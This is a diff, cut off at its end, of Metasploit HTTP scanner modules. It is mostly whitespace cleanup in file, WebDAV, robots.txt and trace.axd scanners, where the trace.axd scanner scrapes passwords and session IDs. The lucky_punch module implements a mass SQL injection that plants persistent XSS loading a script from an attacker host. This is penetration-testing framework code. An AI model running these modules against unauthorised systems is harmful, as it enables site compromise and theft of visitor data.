- + extensions.each { |ext| begin testfext = testf.chomp + ext @@ -89,9 +92,9 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain' }, 20) - if (res and res.code >= 200 and res.code < 300) + if (res and res.code >= 200 and res.code < 300) print_status("Found #{wmap_base_url}#{tpath}#{testfext}") - + report_note( :host => ip, :proto => 'HTTP', @@ -99,16 +102,16 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{tpath}#{testfext} Code: #{res.code}" ) - + else - print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}") + print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + } - + end end diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index d9aa5b705b..9cf6dc7579 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,65 +21,65 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Interesting File Scanner', 'Description' => %q{ - This module identifies the existence of interesting files - in a given directory path. + This module identifies the existence of interesting files + in a given directory path. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path to identify files", '/']), OptString.new('EXT', [ false, "Append file extension to use", '']), - OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use", + OptPath.new('DICTIONARY', [ false, "Path of word dictionary to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_files.txt") ] ) - ], self.class) - + ], self.class) + register_advanced_options( [ OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]), - OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", + OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt") ] ), OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]), OptInt.new('TestThreads', [ true, "Number of test threads", 25]) - ], self.class) - + ], self.class) + end def run_host(ip) conn = false - - tpath = datastore['PATH'] + + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' end - + nt = datastore['TestThreads'].to_i nt = 1 if nt == 0 - + dm = datastore['NoDetailMessages'] - + queue = [] - + File.open(datastore['DICTIONARY']).each do |testf| queue << testf.strip - end - + end + # # Detect error code - # - ecode = datastore['ErrorCode'].to_i + # + ecode = datastore['ErrorCode'].to_i begin randfile = Rex::Text.rand_text_alpha(5).chomp - + res = send_request_cgi({ 'uri' => tpath+randfile+ datastore['EXT'], 'method' => 'GET', @@ -87,8 +87,8 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i + + tcode = res.code.to_i # Look for a string we can signature on as well if(tcode >= 200 and tcode <= 299) @@ -109,37 +109,37 @@ class Metasploit3 < Msf::Auxiliary ecode = tcode print_status("Using code '#{ecode}' as not found.") end - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE - end - + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE + end + while(not queue.empty?) t = [] - 1.upto(nt) do + 1.upto(nt) do t << Thread.new(queue.shift) do |testf| Thread.current.kill if not testf - + testfext = testf.chomp + datastore['EXT'] res = send_request_cgi({ 'uri' => tpath+testfext, 'method' => 'GET', 'ctype' => 'text/plain' }, 20) - + if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg)))) if dm == false - print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") + print_status("NOT Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") #blah end else - if res.code.to_i == 400 and ecode != 400 - print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") + if res.code.to_i == 400 and ecode != 400 + print_error("Server returned an error code. #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") else print_status("Found #{wmap_base_url}#{tpath}#{testfext} #{res.code.to_i}") - + report_note( :host => ip, :proto => 'HTTP', @@ -147,8 +147,8 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{tpath}#{testfext} Code: #{res.code}" ) - - end + + end end end end diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index ce0ce92b73..7d4eeaba3b 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -45,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary end info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/" - + connect sock.put("GET /_vti_inf.html HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + "Keep-Alive: 300\r\n" + @@ -77,27 +81,27 @@ class Metasploit3 < Msf::Auxiliary def check_account(info, fpversion, target_host) - return if not fpversion + return if not fpversion connect - # http://msdn2.microsoft.com/en-us/library/ms454298.aspx + # http://msdn2.microsoft.com/en-us/library/ms454298.aspx method = "method=open+service:#{fpversion}&service_name=/" - req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + - "Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" + + req = "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n" + "TE: deflate,gzip;q=0.3\r\n" + + "Keep-Alive: 300\r\n" + "Connection: Keep-Alive, TE\r\n" + "Host: #{target_host}\r\n" + "User-Agent: " + datastore['UserAgent'] + "\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" + - "Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n" - + "Content-Length: #{method.length}\r\n\r\n" + method + "\r\n\r\n" + sock.put(req) res = sock.get_once - - - + + + if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/)) retcode = $1 retmsg = $2.strip - + if(retcode == "100") res = sock.get_once if(res and res.match(/^HTTP\/1\.[01]\s+([^\s]+)\s+(.*)/)) @@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{info} FrontPage Unknown Response [#{retcode}]") end end - + disconnect end diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 66842a2674..9b52856a4b 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,17 +22,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection', 'Description' => %q{ - This module implements the mass SQL injection attack in + This module implements the mass SQL injection attack in use lately by concatenation of HTML string that forces a persistant XSS attack to redirect user browser to a attacker controller website. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('URI', [ true, "The path/file to identify backups", '/index.asp']), @@ -40,17 +40,17 @@ class Metasploit3 < Msf::Auxiliary OptString.new('VULN_PAR', [ true, "Vulnerable parameter name", 'p1']), OptBool.new('TEXT_INT_INJECTION', [ true, "Perform string injection", false]), OptBool.new('COMMENTED', [ true, "Comment end of query", true]), - OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']), - ], self.class) - + OptString.new('EVIL_HTML', [ true, "Evil HTML to add to tables", '<script src=http://browser-autopwn.com/evilscript.js></script>']), + ], self.class) + end def wmap_enabled false - end + end def run_host(ip) - + #Weird to indent for practical reasons. infstr = %Q{ DECLARE @T varchar(255),@C varchar(255) @@ -71,36 +71,36 @@ DECLARE @T varchar(255),@C varchar(255) prestr = ";DECLARE @S NVARCHAR(4000);SET @S=CAST(" poststr = " AS NVARCHAR(4000));EXEC(@S);" - + gvars = queryparse(datastore['QUERY']) #Now its a Hash - + if gvars.has_key?(datastore['VULN_PAR']) - + prestr = datastore['TEXT_INT_INJECTION'] ? "\'#{prestr}" : nil poststr = datastore['COMMENTED'] ? "#{poststr}--" : nil - attstr = "" - infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" } + attstr = "" + infstr.unpack("C*").collect! { |i| attstr += i.to_s(base=16).upcase+"00" } gvars[datastore['VULN_PAR']] += prestr + "0x"+attstr + poststr - else + else print_status("Error: Vulnerable parameter is not part of the supplied query string.") return end - + begin normalres = send_request_cgi({ 'uri' => datastore['URI'], - 'vars_get' => gvars, + 'vars_get' => gvars, 'method' => 'GET', 'ctype' => 'text/plain' }, 20) rescue ::Rex::ConnectionError - rescue ::Errno::EPIPE + rescue ::Errno::EPIPE end - - print_status("Request sent.") - + + print_status("Request sent.") + end end diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index 8fea25fe30..b16f20cd71 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,27 +21,27 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Previous Directory File Scanner', 'Description' => %q{ This module identifies files in the first parent directory with same name as the given directory path. Example: Test /backup/files/ will look for the - following files /backup/files.ext . + following files /backup/files.ext . }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The test path. The default value will not work.", '/']) - ], self.class) - + ], self.class) + end def run_host(ip) - extensions = [ - '.null', + extensions = [ + '.null', '.backup', '.bak', '.c', @@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary '.htm', '.jar', '.log', - '.old', + '.old', '.orig', '.o', '.tar', @@ -63,18 +67,18 @@ class Metasploit3 < Msf::Auxiliary ] tpath = datastore['PATH'] - + if tpath.eql? "/"||"" print_error("Blank or default PATH set."); return end - + if tpath[-1,1] != '/' tpath += '/' - end - + end + extensions << datastore['EXT'] - + extensions.each { |ext| begin testf = tpath.chop+ext @@ -85,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain' }, 20) - if (res and res.code >= 200 and res.code < 300) + if (res and res.code >= 200 and res.code < 300) print_status("Found #{wmap_base_url}#{testf}") - + report_note( :host => ip, :proto => 'HTTP', @@ -95,16 +99,16 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{testf} Code: #{res.code}" ) - + else - print_status("NOT Found #{wmap_base_url}#{testf}") + print_status("NOT Found #{wmap_base_url}#{testf}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - + } - + end end diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index d66e6907e1..4753415c23 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,42 +23,42 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP File Extension Scanner', 'Description' => %q{ - This module identifies the existence of additional files + This module identifies the existence of additional files by modifying the extension of an existing file. - + }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path/file to identify additional files", '/default.asp']), - OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']), + OptString.new('EXT', [ false, "File extension to replace (blank for automatic replacement of extension)", '']), ], self.class) - + register_advanced_options( [ OptInt.new('ErrorCode', [ true, "The expected http code for non existant files", 404]), - OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", + OptPath.new('HTTP404Sigs', [ false, "Path of 404 signatures to use", File.join(Msf::Config.install_root, "data", "wmap", "wmap_404s.txt") ] ), OptBool.new('NoDetailMessages', [ false, "Do not display detailed test messages", true ]) - ], self.class) - - + ], self.class) + + end def run_host(ip) - + conn = false - + dm = datastore['NoDetailMessages'] - + extensions= [ 'bak', 'txt', @@ -72,19 +72,19 @@ class Metasploit3 < Msf::Auxiliary tpathfile = Pathname.new(datastore['PATH']) tpathnoext = tpathfile.to_s[0..datastore['PATH'].rindex(tpathfile.extname)] - + extensions.each { |testext| - + # # Detect error code. This module is a special case as each extension - # usually is handled diferently by the server with different error codes - # - ecode = datastore['ErrorCode'].to_i + # usually is handled diferently by the server with different error codes + # + ecode = datastore['ErrorCode'].to_i begin randchars = Rex::Text.rand_text_alpha(3).chomp tpath = tpathnoext+randchars+testext - + res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', @@ -92,14 +92,14 @@ class Metasploit3 < Msf::Auxiliary }, 20) return if not res - - tcode = res.code.to_i + + tcode = res.code.to_i emesg = "" - + # Look for a string we can signature on as well if(tcode >= 200 and tcode <= 299) - + File.open(datastore['HTTP404Sigs']).each do |str| if(res.body.index(str)) emesg = str @@ -117,14 +117,14 @@ class Metasploit3 < Msf::Auxiliary ecode = tcode print_status("Using code '#{ecode}' as not found.") end - + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - conn = false - rescue ::Timeout::Error, ::Errno::EPIPE + conn = false + rescue ::Timeout::Error, ::Errno::EPIPE end - + #if not conn return - + begin tpath = tpathnoext+testext res = send_request_cgi({ @@ -132,18 +132,18 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'ctype' => 'text/plain' }, 20) - + if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg)))) if dm == false - print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}") + print_status("NOT Found #{wmap_base_url}#{tpath} #{res.code.to_i}") #blah end else - if res.code.to_i == 400 and ecode != 400 - print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}") + if res.code.to_i == 400 and ecode != 400 + print_error("Server returned an error code. #{wmap_base_url}#{tpath} #{res.code.to_i}") else print_status("Found #{wmap_base_url}#{tpath}") - + report_note( :host => ip, :proto => 'HTTP', @@ -151,14 +151,14 @@ class Metasploit3 < Msf::Auxiliary :type => 'FILE', :data => "#{tpath} Code: #{res.code}" ) - + end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE - end + rescue ::Timeout::Error, ::Errno::EPIPE + end } - + end end diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 918faeeacb..eb39cdfcfa 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer @@ -26,43 +30,43 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['et'], 'License' => MSF_LICENSE ) - + register_options( [ OptString.new('PATH', [ true, "The test path to find robots.txt file", '/']) - + ], self.class) - + end def run_host(target_host) - - tpath = datastore['PATH'] + + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' end begin turl = tpath+'robots.txt' - + res = send_request_cgi({ - 'uri' => turl, + 'uri' => turl, 'method' => 'GET', 'version' => '1.0', }, 10) - - if res and res.body.include?("llow:") + + if res and res.body.include?("llow:") print_status("[#{target_host}] #{tpath}robots.txt found") - - # short url regex + + # short url regex aregex = /llow:[ ]{0,2}(.*?)$/i result = res.body.scan(aregex).flatten.map{|s| s.strip}.uniq - + print_status("[#{target_host}] #{tpath}robots.txt - #{result.join(", ")}") - result.each do |u| - + result.each do |u| + report_note( :host => target_host, :proto => 'HTTP', @@ -70,10 +74,10 @@ class Metasploit3 < Msf::Auxiliary :type => 'ROBOTS_TXT', :data => "#{u}" ) - + end - end - + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index fc0371a988..7eb6cf7700 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,9 +14,9 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanDir # Scanner mixin should be near last include Msf::Auxiliary::Scanner @@ -26,38 +30,38 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['c4an'], 'License' => MSF_LICENSE ) - + register_options( [ OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']), - OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ]) + OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ]) ], self.class) - + register_advanced_options( [ OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log']) ], self.class) - end + end - def run_host(target_host) - tpath = datastore['PATH'] + def run_host(target_host) + tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' end begin turl = tpath+'trace.axd' - + res = send_request_cgi({ - 'uri' => turl, + 'uri' => turl, 'method' => 'GET', 'version' => '1.0', }, 10) - - if res and res.body.include?("<td><h1>Application Trace</h1></td>") - print_status("[#{target_host}] #{tpath}trace.axd FOUND.") - + + if res and res.body.include?("<td><h1>Application Trace</h1></td>") + print_status("[#{target_host}] #{tpath}trace.axd FOUND.") + report_note( :host => target_host, :proto => 'HTTP', @@ -65,55 +69,55 @@ class Metasploit3 < Msf::Auxiliary :type => 'TRACE_AXD', :data => "trace.axd" ) - - if datastore['TRACE_DETAILS'] - aregex = /Trace.axd\?id=\d/ + if datastore['TRACE_DETAILS'] + + aregex = /Trace.axd\?id=\d/ result = res.body.scan(aregex).uniq - + result.each do |u| turl = tpath+u.to_s - + res = send_request_cgi({ - 'uri' => turl, + 'uri' => turl, 'method' => 'GET', 'version' => '1.0', }, 10) - + if res - reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/, + reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/, /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/, /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/, - /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, + /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/ - ] + ] print_status ("DETAIL: #{turl}") reg_info.each do |reg| result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq str = result.to_s.chomp - - - if reg.to_s.include?"APPL_PHYSICAL_PATH" + + + if reg.to_s.include?"APPL_PHYSICAL_PATH" print_status ("Physical Path: #{str}") elsif reg.to_s.include?"UserId" print_status ("User ID: #{str}") elsif reg.to_s.include?"Password" - print_status ("Password: #{str}") + print_status ("Password: #{str}") elsif reg.to_s.include?"AspFilterSessionId" print_status ("Session ID: #{str}") - elsif reg.to_s.include?"LOCAL_ADDR" + elsif reg.to_s.include?"LOCAL_ADDR" print_status ("Local Address: #{str}") elsif result.include?"Via" print_status ("VIA: #{str}") - elsif reg.to_s.include?"ALL_RAW" + elsif reg.to_s.include?"ALL_RAW" print_status ("Headers: #{str}") end end - end - end + end + end end - end - + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index b90fe5b74a..364fa76527 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -1,6 +1,9 @@ +## +# $Id$ +## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,29 +14,29 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer # Scanner mixin should be near last include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Verb Authentication Bypass Scanner', 'Description' => %q{ This module test for authentication bypass using different HTTP verbs. - + }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path to test", '/']) - ], self.class) + ], self.class) end # Fingerprint a single host @@ -43,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary 'HEAD', 'TRACE', 'TRACK', - 'WMAP' + 'WMAP' ] @@ -54,12 +57,12 @@ class Metasploit3 < Msf::Auxiliary }, 10) if res - + auth_code = res.code - + if res.headers['WWW-Authenticate'] print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]") - + report_note( :host => ip, :proto => 'HTTP', @@ -67,18 +70,18 @@ class Metasploit3 < Msf::Auxiliary :type => 'WWW_AUTHENTICATE', :data => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}" ) - + verbs.each do |tv| resauth = send_request_raw({ 'uri' => datastore['PATH'], 'method' => tv }, 10) - - if resauth + + if resauth print_status("Testing verb #{tv} resp code: [#{resauth.code}]") if resauth.code != auth_code and resauth.code <= 302 print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}") - + report_note( :host => ip, :proto => 'HTTP', @@ -88,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary ) end end - end + end else print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}") end diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 222a62c3ad..3c063a854f 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer @@ -26,14 +30,14 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['et'], 'License' => MSF_LICENSE ) - + end def run_host(target_host) begin res = send_request_cgi({ - 'uri' => '/', + 'uri' => '/', 'method' => 'PROPFIND', 'data' => '', 'ctype' => 'text/xml', @@ -41,19 +45,19 @@ class Metasploit3 < Msf::Auxiliary 'vhost' => '', }, 10) - - if res and res.body - # short regex + + if res and res.body + # short regex intipregex = /(192\.168\.[0-9]{1,3}\.[0-9]{1,3}|10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})/i #print_status("#{res.body}") result = res.body.scan(intipregex).uniq - + result.each do |addr| print_status("Found internal IP in WebDAV response (#{target_host}) #{addr}") - + report_note( :host => target_host, :proto => 'HTTP', @@ -62,8 +66,8 @@ class Metasploit3 < Msf::Auxiliary :data => "#{addr}" ) end - end - + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index a5ece12c5b..4c43973fe2 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer @@ -26,27 +30,27 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['et'], 'License' => MSF_LICENSE ) - + end def run_host(target_host) begin res = send_request_raw({ - 'uri' => '/', + 'uri' => '/', 'method' => 'OPTIONS' }, 10) if res and res.code == 200 - + tserver = res.headers['Server'] - - if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV')) + + if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV')) wdtype = 'WEBDAV' if res.headers['X-MSDAVEXT'] wdtype = 'SHAREPOINT DAV' - end - + end + print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED") report_note( @@ -60,8 +64,8 @@ class Metasploit3 < Msf::Auxiliary else print_status("#{target_host} (#{tserver}) WebDAV disabled.") end - end - + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index b3b5170adb..2b7f8237e2 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,7 +14,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer @@ -26,14 +30,14 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['et'], 'License' => MSF_LICENSE ) - + end def run_host(target_host) begin res = send_request_cgi({ - 'uri' => '/', + 'uri' => '/', 'method' => 'PROPFIND', 'data' => '', 'ctype' => 'text/xml', @@ -41,19 +45,19 @@ class Metasploit3 < Msf::Auxiliary 'vhost' => '', }, 10) - - if res and res.body - # short url regex + + if res and res.body + # short url regex urlregex = /<a:href[^>]*>(.*?)<\/a:href>/i #print_status("#{res.body}") result = res.body.scan(urlregex).uniq - + result.each do |u| print_status("Found file or directory in WebDAV response (#{target_host}) #{u}") - + report_note( :host => target_host, :proto => 'HTTP', @@ -61,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary :type => 'WEBDAV_FILE_DIRECTORY', :data => "#{u}" ) - + end - end - + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, 